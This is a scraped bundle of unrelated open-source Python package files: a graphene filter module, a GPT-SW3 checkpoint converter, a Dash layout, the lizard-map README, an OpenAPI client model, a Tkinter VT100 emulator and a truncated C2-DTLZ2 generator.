from django_filters.filterset import FILTER_FOR_DBFIELD_DEFAULTS, BaseFilterSet
from graphene import Argument, InputField, InputObjectType, String
from graphene.types.inputobjecttype import InputObjectTypeOptions
from graphene.types.utils import yank_fields_from_attrs
from ..filters import GlobalIDFilter, GlobalIDMultipleChoiceFilter
from .common import NonNullList
from .converter import convert_field
GLOBAL_ID_FILTERS = {
models.AutoField: {"filter_class": GlobalIDFilter},
models.OneToOneField: {"filter_class": GlobalIDFilter},
models.ForeignKey: {"filter_class": GlobalIDFilter},
models.ManyToManyField: {"filter_class": GlobalIDMultipleChoiceFilter},
models.ManyToOneRel: {"filter_class": GlobalIDMultipleChoiceFilter},
models.ManyToManyRel: {"filter_class": GlobalIDMultipleChoiceFilter},
}
class GraphQLFilterSetMixin(BaseFilterSet):
FILTER_DEFAULTS = dict(
itertools.chain(FILTER_FOR_DBFIELD_DEFAULTS.items(), GLOBAL_ID_FILTERS.items())
)
def get_filterset_class(filterset_class=None):
return type(
"GraphQL{}".format(filterset_class.__name__),
(filterset_class, GraphQLFilterSetMixin),
{},
)
class FilterInputObjectType(InputObjectType):
@classmethod
def __init_subclass_with_meta__(
cls, _meta=None, model=None, filterset_class=None, fields=None, **options
):
cls.custom_filterset_class = filterset_class
cls.filterset_class = None
cls.fields = fields
cls.model = model
if not _meta:
_meta = InputObjectTypeOptions(cls)
fields = cls.get_filtering_args_from_filterset()
fields = yank_fields_from_attrs(fields, _as=InputField)
if _meta.fields:
_meta.fields.update(fields)
else:
_meta.fields = fields
super().__init_subclass_with_meta__(_meta=_meta, **options)
@classmethod
def get_filtering_args_from_filterset(cls):
if not cls.custom_filterset_class:
raise ValueError("Provide filterset class")
cls.filterset_class = get_filterset_class(cls.custom_filterset_class)
args = {}
for name, filter_field in cls.filterset_class.base_filters.items():
input_class = getattr(filter_field, "input_class", None)
if input_class:
field_type = convert_field(filter_field)
else:
field_type = convert_field(filter_field.field)
field_type.description = getattr(filter_field, "help_text", "")
kwargs = getattr(field_type, "kwargs", {})
field_type.kwargs = kwargs
args[name] = field_type
return args
class StringFilterInput(graphene.InputObjectType):
eq = graphene.String(required=False)
one_of = NonNullList(graphene.String, required=False)
|
PypiClean
|
/llm_toys-0.1.1-py3-none-any.whl/llm_toys/hf/transformers/models/gpt_sw3/convert_megatron_to_pytorch.py
|
""" Convert GPT-SW3 megatron checkpoints to pytorch"""
import argparse
import os
from os.path import isfile
import torch
from transformers import GPT2Config
def recursive_print(name, val, spaces=0):
# Format the message.
if name is None:
msg = None
else:
fmt = "." * max(0, spaces - 2) + "# {:" + str(50 - spaces) + "s}"
msg = fmt.format(name)
# Print and recurse (if needed).
if isinstance(val, dict):
if msg is not None:
print(msg)
for k in val.keys():
recursive_print(k, val[k], spaces + 2)
elif isinstance(val, torch.Tensor):
print(msg, ":", val.size())
else:
print(msg, ":", val)
def fix_query_key_value_ordering(param, num_splits, num_heads, hidden_size):
# Permutes layout of param tensor to [num_splits * num_heads * hidden_size, :]
# for compatibility with later versions of NVIDIA Megatron-LM.
# The inverse operation is performed inside Megatron-LM to read checkpoints:
# https://github.com/NVIDIA/Megatron-LM/blob/v2.4/megatron/checkpointing.py#L209
# If param is the weight tensor of the self-attention block, the returned tensor
# will have to be transposed one more time to be read by HuggingFace GPT2.
input_shape = param.size()
# other versions store [num_heads * num_splits * hidden_size, :]
saved_shape = (num_heads, num_splits, hidden_size) + input_shape[1:]
param = param.view(*saved_shape)
param = param.transpose(0, 1).contiguous()
param = param.view(*input_shape)
return param
def convert_megatron_checkpoint(sd_megatron, config):
"""
Converts a Megatron checkpoint to a HuggingFace GPT-SW3 checkpoint.
"""
n_positions = config.n_positions
layers = config.n_layer
vocab_size = config.vocab_size
heads = config.n_head
hidden_size_per_head = config.n_embd // config.n_head
word_embeddings = sd_megatron["model.language_model.embedding.word_embeddings.weight"][:vocab_size, :]
sd_hf = {
"transformer.wte.weight": word_embeddings,
"transformer.wpe.weight": sd_megatron["model.language_model.embedding.position_embeddings.weight"],
"transformer.ln_f.weight": sd_megatron["model.language_model.encoder.final_layernorm.weight"],
"transformer.ln_f.bias": sd_megatron["model.language_model.encoder.final_layernorm.bias"],
}
pf = "model.language_model.encoder.layers."
for i in range(layers):
causal_mask = torch.tril(torch.ones((n_positions, n_positions), dtype=torch.bool))
causal_mask = causal_mask.view(1, 1, n_positions, n_positions)
sd_hf[f"transformer.h.{i}.attn.bias"] = causal_mask
sd_hf[f"transformer.h.{i}.attn.masked_bias"] = torch.tensor(-1e4, dtype=torch.bfloat16)
sd_hf[f"transformer.h.{i}.ln_1.weight"] = sd_megatron[f"{pf}{i}.input_layernorm.weight"]
sd_hf[f"transformer.h.{i}.ln_1.bias"] = sd_megatron[f"{pf}{i}.input_layernorm.bias"]
val1 = sd_megatron[f"{pf}{i}.self_attention.query_key_value.weight"]
val1 = fix_query_key_value_ordering(val1, 3, heads, hidden_size_per_head)
sd_hf[f"transformer.h.{i}.attn.c_attn.weight"] = val1.transpose(0, 1).contiguous()
val2 = sd_megatron[f"{pf}{i}.self_attention.query_key_value.bias"]
val2 = fix_query_key_value_ordering(val2, 3, heads, hidden_size_per_head)
sd_hf[f"transformer.h.{i}.attn.c_attn.bias"] = val2
sd_hf[f"transformer.h.{i}.attn.c_proj.weight"] = sd_megatron[f"{pf}{i}.self_attention.dense.weight"].transpose(
0, 1
)
sd_hf[f"transformer.h.{i}.attn.c_proj.bias"] = sd_megatron[f"{pf}{i}.self_attention.dense.bias"]
sd_hf[f"transformer.h.{i}.ln_2.weight"] = sd_megatron[f"{pf}{i}.post_attention_layernorm.weight"]
sd_hf[f"transformer.h.{i}.ln_2.bias"] = sd_megatron[f"{pf}{i}.post_attention_layernorm.bias"]
sd_hf[f"transformer.h.{i}.mlp.c_fc.weight"] = sd_megatron[f"{pf}{i}.mlp.dense_h_to_4h.weight"].transpose(0, 1)
sd_hf[f"transformer.h.{i}.mlp.c_fc.bias"] = sd_megatron[f"{pf}{i}.mlp.dense_h_to_4h.bias"]
sd_hf[f"transformer.h.{i}.mlp.c_proj.weight"] = sd_megatron[f"{pf}{i}.mlp.dense_4h_to_h.weight"].transpose(
0, 1
)
sd_hf[f"transformer.h.{i}.mlp.c_proj.bias"] = sd_megatron[f"{pf}{i}.mlp.dense_4h_to_h.bias"]
# For LM head, transformers' wants the matrix to weight embeddings.
sd_hf["lm_head.weight"] = word_embeddings
return sd_hf
def copy_config(config_hf, config_megatron):
"""Copy the config from Megatron to hf."""
config_hf.vocab_size = 64000
config_hf.n_positions = config_megatron["encoder_seq_length"]
config_hf.n_embd = config_megatron["hidden_size"]
config_hf.n_layer = config_megatron["num_layers"]
config_hf.n_head = config_megatron["num_attention_heads"]
config_hf.n_inner = config_megatron["ffn_hidden_size"]
config_hf.activation_function = "gelu"
config_hf.resid_pdrop = 0.1
config_hf.embd_pdrop = 0.1
config_hf.attn_pdrop = 0.1
config_hf.layer_norm_epsilon = config_megatron["layernorm_epsilon"] # 1e-5
config_hf.initializer_range = config_megatron["init_method_std"] # 0.02
config_hf.apply_query_key_layer_scaling = config_megatron["apply_query_key_layer_scaling"] # True
config_hf.normalize_attention_scores = True
config_hf.use_cache = True
# This identifies the 6.7B (7B) model which uses a different tokenizer
if config_megatron["hidden_size"] == 4096:
config_hf.bos_token_id = 1 # <|endoftext|>
config_hf.eos_token_id = 1 # <|endoftext|>
config_hf.pad_token_id = 0 # <unk>
else:
config_hf.bos_token_id = 2 # <s>
config_hf.eos_token_id = 3 # <|endoftext|>
config_hf.pad_token_id = 0 # <pad>
return config_hf
def main(args):
print(args)
checkpoint_path = args.checkpoint_path
save_path = args.save_path
if isfile(checkpoint_path):
raise FileNotFoundError(f"ERROR! could not find file {checkpoint_path}")
# Load the model.
checkpoint = torch.load(checkpoint_path, map_location="cpu")
# Load the config.
config_megatron = checkpoint["hyper_parameters"]["cfg"]
config_hf = GPT2Config()
config_hf = copy_config(config_hf=config_hf, config_megatron=config_megatron)
config_hf.architectures = ["GPT2LMHeadModel"]
sd_megatron = checkpoint["state_dict"]
# Convert.
print("Converting")
sd_hf = convert_megatron_checkpoint(sd_megatron, config_hf)
# Print the structure of converted state dict.
if args.print_checkpoint_structure:
recursive_print(None, sd_hf)
config_hf.tokenizer_class = "GPTSw3Tokenizer"
# Store the config to file.
print("Saving config")
config_hf.save_pretrained(save_path)
# Store the state_dict to file.
output_checkpoint_file = os.path.join(save_path, "pytorch_model.bin")
print(f'Saving checkpoint to "{output_checkpoint_file}"')
torch.save(sd_hf, output_checkpoint_file)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--checkpoint_path",
type=str,
required=True,
help="e.g. megatron_gpt--val_loss=2.42-step=38000-consumed_samples=54720000",
)
parser.add_argument("--save_path", type=str, required=True, help="e.g. /home/user/gpt-sw3/hf")
parser.add_argument("--print-checkpoint-structure", action="store_true")
_args = parser.parse_args()
main(_args)
|
PypiClean
|
/Heimdallr-0.2.7-py36-none-any.whl/heimdallr/server/board_layout/body.py
|
__author__ = "Christian Heider Nielsen"
__doc__ = r"""
Created on 15/03/2020
"""
from typing import List
from dash import dcc, html
from heimdallr.configuration.heimdallr_config import (
CALENDAR_ID,
CALENDAR_INTERVAL_ID,
CALENDAR_INTERVAL_MS,
DU_INTERVAL_ID,
DU_INTERVAL_MS,
DU_TABLES_ID,
GPU_GRAPHS_ID,
GPU_INTERVAL_ID,
GPU_INTERVAL_MS,
GPU_TABLES_ID,
TEAMS_STATUS_ID,
TEAMS_STATUS_INTERVAL_ID,
TEAMS_STATUS_INTERVAL_MS,
)
__all__ = ["get_body"]
def get_body() -> List[html.Div]:
""" """
return [
html.Div(
[
html.Div(
[
html.Div([], id=CALENDAR_ID),
dcc.Interval(
id=CALENDAR_INTERVAL_ID,
interval=CALENDAR_INTERVAL_MS,
n_intervals=0,
),
],
className="col p-2",
),
html.Div([html.Div([], id=GPU_GRAPHS_ID)], className="col"),
html.Div(
[
html.Div([], id=GPU_TABLES_ID),
],
className="col p-2",
),
dcc.Interval(
id=GPU_INTERVAL_ID, interval=GPU_INTERVAL_MS, n_intervals=0
),
html.Div( # Disk Usage
[
html.Div([], id=DU_TABLES_ID),
dcc.Interval(
id=DU_INTERVAL_ID, interval=DU_INTERVAL_MS, n_intervals=0
),
],
className="col p-2",
),
],
className="row p-2",
),
html.Div( # Teams Status
[
html.Div([], id=TEAMS_STATUS_ID, className="col"),
dcc.Interval(
id=TEAMS_STATUS_INTERVAL_ID,
interval=TEAMS_STATUS_INTERVAL_MS,
n_intervals=0,
),
],
className="row p-1",
),
]
|
PypiClean
|
/lizard-map-5.5.tar.gz/lizard-map-5.5/README.rst
|
lizard-map
==========
Lizard-map provides basic map interaction for `Django
<http://www.djangoproject.com>`_ applications that use a `lizard-ui
<http://pypi.python.org/pypi/lizard-ui>`_ user interface. We designed it at
`Nelen & Schuurmans <http://www.nelen-schuurmans.nl>`_ for our geographical
information websites (with water management information).
It provides:
- Openlayers (map javascript libary) map display and server-side map
generation (mapnik's WMS functionality). Background maps are configurable.
- A "workspace" interaction model: drag mappable items into a workspace and
they'll get displayed. The workspace is stored in the Django database.
- A "collage" attached to every workspace for storing selected info on map
items (like graphs).
- An extention mechanism to plug more or less arbitrary map sources into the
workspace so that they can be displayed, searched, etc.
.. image:: https://secure.travis-ci.org/lizardsystem/lizard-map.png?branch=master
:target: http://travis-ci.org/#!/lizardsystem/lizard-map
Translation status:
.. image:: https://translations.lizard.net/projects/p/lizardsystem/resource/lizard-map/chart/image_png
:target: https://translations.lizard.net/projects/p/lizardsystem/resource/lizard-map/
Core concept: workspaces
------------------------
A *workspace item* is something that can be displayed on a map. A *workspace*
is a collection of workspace items that is actually displayed.
There are two types of workspaces:
- Edit Workspace: Every session/user gets its own workspace. This
workspace can be edited.
- Storage Workspace. TODO: extra info.
A workspace item needs to know how to display itself, how to search for items
when you click on the map and more. To get that to work for arbitrary map
sources, you need to configure an adapter. The adapter has a ``layer()``
method for returning a mapnik layer, a ``search()`` method for searching and
so on.
- You register an adapter as a so-called "setuptools entrypoint" under a
specfic name.
- When you add a workspace item, you pass in the adapter name and an optional
snippet of json to configure the adapter.
The workspace item keeps track of this adapter and its configuragion and uses
it to generate maps, for searching, etc.
Collages
--------
A workspace item often results in multiple areas or points. If you click on
such a point, you normally get a popup with extra information. If you want to
compare a couple of those information "snippets", you can place them in your
*collage*. In the GUI this is called "Selectie".
Clicking the collage gives a popup with all the collected information popups
in that single popup.
Interaction
-----------
Included is quite some javascript for workspace interaction. Potential
workspace items can be drag/dropped into a workspace to add them. Workspace
items can be reordered. You can drag them to the trash.
Dependencies
------------
Almost all dependencies are listed in our ``setup.py``, so they get pulled in
automatically. Not all of them install as good as eggs, though. You might be
better off installing them system-wide with your OS's own packaging system.
You can force buildout to use system-wide installed packages with the
`osc.recipe.sysegg <http://pypi.python.org/pypi/osc.recipe.sysegg>`_ recipe.
An example config::
[buildout]
...
parts =
sysegg
...
[sysegg]
recipe = osc.recipe.sysegg
force-sysegg = true
eggs =
PIL
matplotlib
simplejson
pyproj
Development installation
------------------------
The first time, you'll have to run the "bootstrap" script to set up setuptools
and buildout::
$> python bootstrap.py
And then run buildout to set everything up::
$> bin/buildout
(On windows it is called ``bin\buildout.exe``).
You'll have to re-run buildout when you or someone else made a change in
``setup.py`` or ``buildout.cfg``.
The current package is installed as a "development package", so
changes in .py files are automatically available (just like with ``python
setup.py develop``).
If you want to use trunk checkouts of other packages (instead of released
versions), add them as an "svn external" in the ``local_checkouts/`` directory
and add them to the ``develop =`` list in buildout.cfg.
Tests can always be run with ``bin/test`` or ``bin\test.exe``.
External dependencies
---------------------
The dependencies for a full website that uses lizard-map are best expressed as
ubuntu/debian package dependencies: build-essential, python2.6-dev, apache2,
libjpeg-dev, python-imaging, python-matplotlib, python-mapnik, python-scipy,
libapache2-mod-wsgi, python-gdal, spatialite-bin, python-pysqlite2,
python-pyproj.
Upgrading to Lizard 3
---------------------
Short summary to convert your app to Lizard 3.
- Replace old template tags workspace with workspace_edit and
collage_edit (see below).
- Review urls.py for old lizard_map views. Replace with new ones or
remove.
- Migrate
- Upgrade to class-based views, using one of the View classes
(i.e. AppView). An excellent description can be found when googling
"class based views reinout". You can take lizard-map views as
examples as well.
Site integration
----------------
The following steps has to be done in order to use the
lizard_map/workspace concepts.
- Install lizard-map somewhere. (Add 'lizard-map' in your setup.py:
install_requires)
- Add 'lizard_map' to your settings.py: INSTALLED_APPS.
- Add an entry in your urls.py::
import lizard_map.urls
(r'^map/', include(lizard_map.urls)),
- Use one of the views, i.e. AppView.
Example view::
from lizard_map.views import AppView
class MyAppView(AppView):
template_name = 'my_app/template.html'
Example template::
{% extends "lizard_map/wms.html" %}
{% load workspaces %}
{% block subtitle %} (page name) {% endblock %}
{% block sidebar %}
<div id="iconbox" class="sidebarbox sidebarbox-stretched iconlist">
<h2>Apps</h2>
<ul>
<li>
<a href="/address/" class="lizard-map-link">
<img src="{{ STATIC_URL }}lizard_ui/app_icons/meetgegevens.png" />
<div>App</div>
</a>
</li>
</ul>
</div>
{% workspace_edit view.workspace_edit %}
{% collage_edit view.collage_edit %}
{% endblock %}
- Add this view to your url.py:
import my_app.views
(r'^$', my_app.views.MyAppView.as_view()),
- Start testing by running syncdb / migrate.
- Add and configure background maps by loading "background_maps" fixture.
- Start dev server.
Settings
--------
Some default date range settings can be set in settings.py. All
settings are optional::
START_YEAR = 2000 # Defaults to today - 7 years
END_YEAR = 2010 # Defaults to today + 3 years.
# Define default period 1..5
# From daterange.py:
# PERIOD_DAY = 1
# PERIOD_TWO_DAYS = 2
# PERIOD_WEEK = 3
# PERIOD_MONTH = 4
# PERIOD_YEAR = 5
# PERIOD_OTHER = 6
DEFAULT_PERIOD = 5 # Defaults to 1
# If DEFAULT_PERIOD = 6, define these
DEFAULT_START_DAYS = -20 # Defaults to -1000
DEFAULT_END_DAYS = 1 # Defaults to 10
You can add google analytics to your site by adding the tracking
code::
GOOGLE_TRACKING_CODE = 'AA-12345678-0'
|
PypiClean
|
/gewv-sides-client-1.0.2.tar.gz/gewv-sides-client-1.0.2/gewv_sides_client/model/array_of_boxes.py
|
import re # noqa: F401
import sys # noqa: F401
from gewv_sides_client.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
from ..model_utils import OpenApiModel
from gewv_sides_client.exceptions import ApiAttributeError
def lazy_import():
from gewv_sides_client.model.box import Box
globals()['Box'] = Box
class ArrayOfBoxes(ModelSimple):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
}
@cached_property
def additional_properties_type():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
"""
lazy_import()
return (bool, date, datetime, dict, float, int, list, str, none_type,) # noqa: E501
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
lazy_import()
return {
'value': ([Box],),
}
@cached_property
def discriminator():
return None
attribute_map = {}
read_only_vars = set()
_composed_schemas = None
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs):
"""ArrayOfBoxes - a model defined in OpenAPI
Note that value can be passed either in args or in kwargs, but not in both.
Args:
args[0] ([Box]): # noqa: E501
Keyword Args:
value ([Box]): # noqa: E501
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
"""
# required up here when default value is not given
_path_to_item = kwargs.pop('_path_to_item', ())
if 'value' in kwargs:
value = kwargs.pop('value')
elif args:
args = list(args)
value = args.pop(0)
else:
raise ApiTypeError(
"value is required, but not passed in args or kwargs and doesn't have default",
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.value = value
if kwargs:
raise ApiTypeError(
"Invalid named arguments=%s passed to %s. Remove those invalid named arguments." % (
kwargs,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
@classmethod
@convert_js_args_to_python_args
def _from_openapi_data(cls, *args, **kwargs):
"""ArrayOfBoxes - a model defined in OpenAPI
Note that value can be passed either in args or in kwargs, but not in both.
Args:
args[0] ([Box]): # noqa: E501
Keyword Args:
value ([Box]): # noqa: E501
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
"""
# required up here when default value is not given
_path_to_item = kwargs.pop('_path_to_item', ())
self = super(OpenApiModel, cls).__new__(cls)
if 'value' in kwargs:
value = kwargs.pop('value')
elif args:
args = list(args)
value = args.pop(0)
else:
raise ApiTypeError(
"value is required, but not passed in args or kwargs and doesn't have default",
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.value = value
if kwargs:
raise ApiTypeError(
"Invalid named arguments=%s passed to %s. Remove those invalid named arguments." % (
kwargs,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
return self
|
PypiClean
|
/zope.app.twisted-3.5.0.tar.gz/zope.app.twisted-3.5.0/src/twisted/conch/ui/tkvt100.py
|
#
"""Module to emulate a VT100 terminal in Tkinter.
Maintainer: U{Paul Swartz <mailto:[email protected]>}
"""
import Tkinter, tkFont
import ansi
import string
ttyFont = None#tkFont.Font(family = 'Courier', size = 10)
fontWidth, fontHeight = None,None#max(map(ttyFont.measure, string.letters+string.digits)), int(ttyFont.metrics()['linespace'])
colorKeys = (
'b', 'r', 'g', 'y', 'l', 'm', 'c', 'w',
'B', 'R', 'G', 'Y', 'L', 'M', 'C', 'W'
)
colorMap = {
'b': '#000000', 'r': '#c40000', 'g': '#00c400', 'y': '#c4c400',
'l': '#000080', 'm': '#c400c4', 'c': '#00c4c4', 'w': '#c4c4c4',
'B': '#626262', 'R': '#ff0000', 'G': '#00ff00', 'Y': '#ffff00',
'L': '#0000ff', 'M': '#ff00ff', 'C': '#00ffff', 'W': '#ffffff',
}
class VT100Frame(Tkinter.Frame):
def __init__(self, *args, **kw):
global ttyFont, fontHeight, fontWidth
ttyFont = tkFont.Font(family = 'Courier', size = 10)
fontWidth, fontHeight = max(map(ttyFont.measure, string.letters+string.digits)), int(ttyFont.metrics()['linespace'])
self.width = kw.get('width', 80)
self.height = kw.get('height', 25)
self.callback = kw['callback']
del kw['callback']
kw['width'] = w = fontWidth * self.width
kw['height'] = h = fontHeight * self.height
Tkinter.Frame.__init__(self, *args, **kw)
self.canvas = Tkinter.Canvas(bg='#000000', width=w, height=h)
self.canvas.pack(side=Tkinter.TOP, fill=Tkinter.BOTH, expand=1)
self.canvas.bind('<Key>', self.keyPressed)
self.canvas.bind('<1>', lambda x: 'break')
self.canvas.bind('<Up>', self.upPressed)
self.canvas.bind('<Down>', self.downPressed)
self.canvas.bind('<Left>', self.leftPressed)
self.canvas.bind('<Right>', self.rightPressed)
self.canvas.focus()
self.ansiParser = ansi.AnsiParser(ansi.ColorText.WHITE, ansi.ColorText.BLACK)
self.ansiParser.writeString = self.writeString
self.ansiParser.parseCursor = self.parseCursor
self.ansiParser.parseErase = self.parseErase
#for (a, b) in colorMap.items():
# self.canvas.tag_config(a, foreground=b)
# self.canvas.tag_config('b'+a, background=b)
#self.canvas.tag_config('underline', underline=1)
self.x = 0
self.y = 0
self.cursor = self.canvas.create_rectangle(0,0,fontWidth-1,fontHeight-1,fill='green',outline='green')
def _delete(self, sx, sy, ex, ey):
csx = sx*fontWidth + 1
csy = sy*fontHeight + 1
cex = ex*fontWidth + 3
cey = ey*fontHeight + 3
items = self.canvas.find_overlapping(csx,csy, cex,cey)
for item in items:
self.canvas.delete(item)
def _write(self, ch, fg, bg):
if self.x == self.width:
self.x = 0
self.y+=1
if self.y == self.height:
[self.canvas.move(x,0,-fontHeight) for x in self.canvas.find_all()]
self.y-=1
canvasX = self.x*fontWidth + 1
canvasY = self.y*fontHeight + 1
items = self.canvas.find_overlapping(canvasX, canvasY, canvasX+2, canvasY+2)
if items:
[self.canvas.delete(item) for item in items]
if bg:
self.canvas.create_rectangle(canvasX, canvasY, canvasX+fontWidth-1, canvasY+fontHeight-1, fill=bg, outline=bg)
self.canvas.create_text(canvasX, canvasY, anchor=Tkinter.NW, font=ttyFont, text=ch, fill=fg)
self.x+=1
def write(self, data):
#print self.x,self.y,repr(data)
#if len(data)>5: raw_input()
self.ansiParser.parseString(data)
self.canvas.delete(self.cursor)
canvasX = self.x*fontWidth + 1
canvasY = self.y*fontHeight + 1
self.cursor = self.canvas.create_rectangle(canvasX,canvasY,canvasX+fontWidth-1,canvasY+fontHeight-1, fill='green', outline='green')
self.canvas.lower(self.cursor)
def writeString(self, i):
if not i.display:
return
fg = colorMap[i.fg]
bg = i.bg != 'b' and colorMap[i.bg]
for ch in i.text:
b = ord(ch)
if b == 7: # bell
self.bell()
elif b == 8: # BS
if self.x:
self.x-=1
elif b == 9: # TAB
[self._write(' ',fg,bg) for i in range(8)]
elif b == 10:
if self.y == self.height-1:
self._delete(0,0,self.width,0)
[self.canvas.move(x,0,-fontHeight) for x in self.canvas.find_all()]
else:
self.y+=1
elif b == 13:
self.x = 0
elif 32 <= b < 127:
self._write(ch, fg, bg)
def parseErase(self, erase):
if ';' in erase:
end = erase[-1]
parts = erase[:-1].split(';')
[self.parseErase(x+end) for x in parts]
return
start = 0
x,y = self.x, self.y
if len(erase) > 1:
start = int(erase[:-1])
if erase[-1] == 'J':
if start == 0:
self._delete(x,y,self.width,self.height)
else:
self._delete(0,0,self.width,self.height)
self.x = 0
self.y = 0
elif erase[-1] == 'K':
if start == 0:
self._delete(x,y,self.width,y)
elif start == 1:
self._delete(0,y,x,y)
self.x = 0
else:
self._delete(0,y,self.width,y)
self.x = 0
elif erase[-1] == 'P':
self._delete(x,y,x+start,y)
def parseCursor(self, cursor):
#if ';' in cursor and cursor[-1]!='H':
# end = cursor[-1]
# parts = cursor[:-1].split(';')
# [self.parseCursor(x+end) for x in parts]
# return
start = 1
if len(cursor) > 1 and cursor[-1]!='H':
start = int(cursor[:-1])
if cursor[-1] == 'C':
self.x+=start
elif cursor[-1] == 'D':
self.x-=start
elif cursor[-1]=='d':
self.y=start-1
elif cursor[-1]=='G':
self.x=start-1
elif cursor[-1]=='H':
if len(cursor)>1:
y,x = map(int, cursor[:-1].split(';'))
y-=1
x-=1
else:
x,y=0,0
self.x = x
self.y = y
def keyPressed(self, event):
if self.callback and event.char:
self.callback(event.char)
return 'break'
def upPressed(self, event):
self.callback('\x1bOA')
def downPressed(self, event):
self.callback('\x1bOB')
def rightPressed(self, event):
self.callback('\x1bOC')
def leftPressed(self, event):
self.callback('\x1bOD')
|
PypiClean
|
/pviz-0.1.0rc15.tar.gz/pviz-0.1.0rc15/viz/generators/c2dtlz2.py
|
import numpy as np
from viz.generators import dtlz2
from viz.utils import transform as tr
__all__ = ["surface"]
def cvf(F):
r"""The constraint function.
This procedure computes the constraint violation values on
an objective vector 'F'.
"""
m = F.shape[0]
if m == 2:
r = 0.25
elif m == 3:
r = 0.4
else:
r = 0.5
r1 = 0.50 * r
lhs = min([((f - 1.0) ** 2) + np.sum([(F[j] ** 2) for j in range(m) if j != i]) - (r ** 2.0) \
for i,f in enumerate(F)])
rhs = np.sum([((f - (1.0 / (m ** 0.5))) ** 2) for f in F]) - (r1 ** 2)
c = min(lhs, rhs)
return c
def get_feasible(F, X):
r"""Filters out the feasible solutions from given data points 'F' (and 'X').
This function computes the constraint violation values for each data points
in matrix 'F' and returns only the feasible points along with the corresponding
design variable values in 'X'.
"""
G = np.apply_along_axis(cvf, 1, F)
If = np.where(G <= 0.0)[0]
return F[If], X[If], G[If]
def surface(r=1, n=10, m=2, mode='lhc', **kwargs):
r"""Generate `n` number of points on split `m`-shpere.
The details of 'C2-DTLZ2' is described in [1]_.
The radius of the `m`-sphere is specified in `r`. The point generation is
currently done in two ways of random sampling -- Latin Hypercube (LHC) and
LHC with normalization. Other ways will be added later.
Parameters
----------
r : float, optional
The radius of the sphere. Default 1 when optional.
n : int, optional
The total number of points. Default 10 when optional.
m : int, optional
The dimension of the sphere. Default 2 when optional.
mode : str, {'lhc', 'lhcl2', 'dd'}, optional
If `mode = `lhc``, then LHC sampling will be used and points will be generated
using standard spherical coordinate systems. If `mode = `lhcl2``, then we will
use a normalized LHC sampling to generate uniformly distributed points on the
